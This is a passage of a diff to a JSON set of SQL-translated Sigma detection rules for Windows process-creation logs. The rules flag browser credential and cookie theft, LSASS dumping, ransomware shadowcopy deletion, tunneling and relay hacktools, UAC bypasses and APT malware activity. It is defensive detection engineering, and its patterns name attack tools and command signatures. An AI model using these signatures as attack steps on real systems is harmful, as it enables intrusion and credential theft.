'%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_sc_sdset_deny_service_access.yml" + "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" }, { - "title": "Network Reconnaissance Activity", - "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", - "status": "test", - "description": "Detects a set of suspicious network related commands often used in recon stages", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Whoami.EXE Execution From Privileged Process", + "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", "tags": [ + "attack.privilege_escalation", "attack.discovery", - "attack.t1087", - "attack.t1082", - "car.2016-03-001" + "attack.t1033" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'whoami.exe' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nslookup_domain_discovery.yml" + "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" }, { - "title": "Suspicious Whoami.EXE Execution", - "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", - "author": "Florian Roth (Nextron 
Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", + "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "status": "test", + "description": "Detects new commands that add new printer port which point to suspicious file", + "author": "EagleEye Team, Florian Roth", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.persistence", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_susp_flags.yml" + "filename": "proc_creation_win_exploit_cve_2020_1048.yml" }, { - "title": "PUA - Chisel Tunneling Tool Execution", - "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", - "status": "experimental", - "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "title": "Potential Maze Ransomware Activity", + "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "status": "test", + "description": "Detects specific process characteristics of Maze ransomware word document droppers", "author": "Florian Roth (Nextron Systems)", "tags": [ - 
"attack.command_and_control", - "attack.t1090.001" - ], - "falsepositives": [ - "Some false positives may occur with other tools with similar commandlines" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_pua_chisel.yml" - }, - { - "title": "Potential PlugX Activity", - "id": "aeab5ec5-be14-471a-80e8-e344418305c2", - "status": "test", - "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.s0013", - "attack.defense_evasion", - "attack.t1574.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((((((((((Image LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\HTML Help 
Workshop\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" - ], - "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" - }, - { - "title": "Tasks Folder Evasion", - "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", - "status": "test", - "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET 
Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", - "author": "Sreeman", - "tags": [ - "attack.defense_evasion", - "attack.persistence", "attack.execution", - "attack.t1574.002" + "attack.t1204.002", + "attack.t1047", + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND Image LIKE '%.tmp' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_task_folder_evasion.yml" + "filename": "proc_creation_win_malware_maze_ransomware.yml" }, { - "title": "Sofacy Trojan Loader Activity", - "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", - "status": "test", - "description": "Detects Trojan loader activity as used by APT28", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "LockerGoga Ransomware Activity", + "id": "74db3488-fd28-480a-95aa-b7af626de068", + "status": "stable", + "description": "Detects LockerGoga ransomware activity via specific command line.", + "author": "Vasiliy Burov, oscd.community", "tags": [ - "attack.g0007", - 
"attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "car.2013-10-002", - "attack.t1218.011" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_sofacy.yml" + "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" }, { - "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", - "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "title": "Kavremover Dropped Binary LOLBIN Usage", + "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", "status": "experimental", - "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE 
'%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" - }, - { - "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", - "id": "ebef4391-1a81-4761-a40a-1db446c0e625", - "status": "test", - "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", - "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" - ], - "falsepositives": [ - "Legitimate software creating script event consumers" + "attack.defense_evasion", + "attack.t1127" ], - "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + "filename": "proc_creation_win_lolbin_kavremover.yml" }, { - "title": "Potential Ke3chang/TidePool Malware Activity", - "id": "7b544661-69fc-419f-9a59-82ccc328f205", - "status": "test", - "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", - "author": "Markus Neis, Swisscom", + "title": "Taskkill Symantec Endpoint Protection", + "id": "4a6713f6-3331-11ed-a261-0242ac120002", + "status": "experimental", + "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services 
incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", + "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", "tags": [ - "attack.g0004", "attack.defense_evasion", "attack.t1562.001" ], 
@@ -10299,73 +9981,28 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" + "filename": "proc_creation_win_taskkill_sep.yml" }, { - "title": "Potential NTLM Coercion Via Certutil.EXE", - "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", + "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", "status": "experimental", - "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "description": "Detects known WMI recon method to look for unquoted service paths using wmic. 
Often used by pentester and attacker enumeration scripts", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_certutil_ntlm_coercion.yml" - }, - { - "title": "HackTool - DInjector PowerShell Cradle Execution", - "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", - "status": "test", - "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_hktl_dinjector.yml" - }, - { - "title": "OilRig APT Activity", - "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", - "status": "test", - "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_oilrig_mar18.yml" + "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" }, { "title": "Potential SMB Relay Attack Tool Execution", @@ -10386,26 +10023,6 @@ ], "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" }, - { - "title": "UAC Bypass WSReset", - "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", - "status": "test", - "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" - ], - "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" - }, { "title": "HackTool - winPEAS Execution", "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", 
@@ -10428,43 +10045,63 @@ "filename": "proc_creation_win_hktl_winpeas.yml" }, { - "title": "Delete All Scheduled Tasks", - "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "title": "Exploiting CVE-2019-1388", + "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "status": "stable", + "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + }, + { + "title": "HackTool - KrbRelay Execution", + "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", "status": "experimental", - "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of KrbRelay, a Kerberos relaying tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" + "SELECT * FROM 
logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_delete_all.yml" + "filename": "proc_creation_win_hktl_krbrelay.yml" }, { - "title": "Hermetic Wiper TG Process Patterns", - "id": "2f974656-6d83-4059-bbdf-68ac5403422f", + "title": "Suspicious Binary In User Directory Spawned From Office Application", + "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", "status": "experimental", - "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", + "author": "Jason Lynch", "tags": [ "attack.execution", - "attack.lateral_movement", - "attack.t1021.001" + "attack.t1204.002", + "attack.g0046", + "car.2013-05-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND 
CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND Image LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" + "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" }, { "title": "Fireball Archer Install", 
@@ -10487,241 +10124,222 @@ "filename": "proc_creation_win_malware_fireball.yml" }, { - "title": "Exploited CVE-2020-10189 Zoho ManageEngine", - "id": "846b866e-2a57-46ee-8e16-85fa92759be7", - "status": "test", - "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", - "author": "Florian Roth (Nextron Systems)", + "title": "Abused Debug Privilege by Arbitrary Parent Processes", + "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "status": "test", + "description": "Detection of unusual child processes by different system processes", + "author": "Semanur Guneysu @semanurtg, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.s0190", - "cve.2020.10189" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR 
ParentImage LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2020_10189.yml" + "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" }, { - "title": "Potential LSASS Process Dump Via Procdump", - "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "title": "Winnti Pipemon Characteristics", + "id": "73d70463-75c9-4258-92c6-17500fe972f2", "status": "stable", - "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.credential_access", - "attack.t1003.001", - "car.2013-05-009" + "attack.t1574.002", + 